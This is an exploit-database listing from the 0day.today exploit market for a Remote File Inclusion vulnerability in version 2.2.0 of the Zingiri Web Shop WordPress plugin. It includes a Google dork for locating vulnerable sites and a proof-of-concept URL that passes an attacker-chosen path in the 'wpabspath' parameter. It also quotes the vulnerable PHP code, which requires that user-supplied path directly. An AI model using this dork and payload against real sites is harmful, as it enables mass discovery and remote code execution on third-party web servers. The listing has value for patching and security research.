[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Zingiri Web Shop Plugin 2.2.0 Remote File Inclusion

Author
Ben Schmidt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16948
Category
web applications
Date add
18-09-2011
Platform
php
# Exploit Title: Zingiri Web Shop Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/zingiri-web-shop
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
# Version: 2.2.0 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
 
---
Vulnerable Code
---
if ($_REQUEST['cms']=='jl') {
    define('ZING_CMS','jl');
    $_REQUEST['tmpl'] = 'component';
    $_REQUEST['option'] = 'com_zingiriwebshop';
    ob_start();
    require($_REQUEST['wpabspath'].'/index.php');
    ob_end_clean();
} elseif ($_REQUEST['cms']=='dp') {
    //all bootstrapping is already done
} else {
    if (!defined('ZING_AJAX') || !ZING_AJAX) {
        /** Loads the WordPress Environment */
        //require($_REQUEST['wpabspath'].'wp-blog-header.php');
        require($_REQUEST['wpabspath'].'wp-load.php');
        /** Load Zingiri Web Shop */
        require(dirname(__FILE__).'/../../zing.readcookie.inc.php');
        require(dirname(__FILE__).'/../../startmodules.inc.php');
    }
}



#  0day.today [2024-12-24]  #